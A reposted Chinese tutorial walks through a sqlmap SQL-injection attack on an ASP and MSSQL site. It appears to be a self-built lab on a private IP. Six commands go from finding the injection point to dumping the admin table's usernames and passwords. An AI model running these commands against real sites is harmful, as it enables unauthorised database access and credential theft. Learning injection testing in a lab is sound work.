安基网 首页 安全 渗透测试 查看内容

实战黑客sqlmap渗透攻击mssql数据库最新教程

2020-3-18 18:11| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 今天搭建了一个asp+mssql数据库的环境用于安全测试学习1.判断注入点及获取网站信息:sqlmap -u http://192.168.1.30/1/onews.asp?id=8web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 20052.获取所 ...

今天搭建了一个asp+mssql数据库的环境用于安全测试学习

1.判断注入点及获取网站信息:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

2.获取所有数据库:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs


网站用的数据库是这个sqlZR

3.获取网站当前使用的数据库:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

4.获取数据库中的表名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

5.获取数据表中的字段名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

6.获取字段中的内容

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

看到了吧,几条命名就把管理员的账号密码给跑出来了。

学习网络安全技术的话,可以关注我,每天都会有相应的教程发布的,

咱们共同学习,进步



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6805076641253949959/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部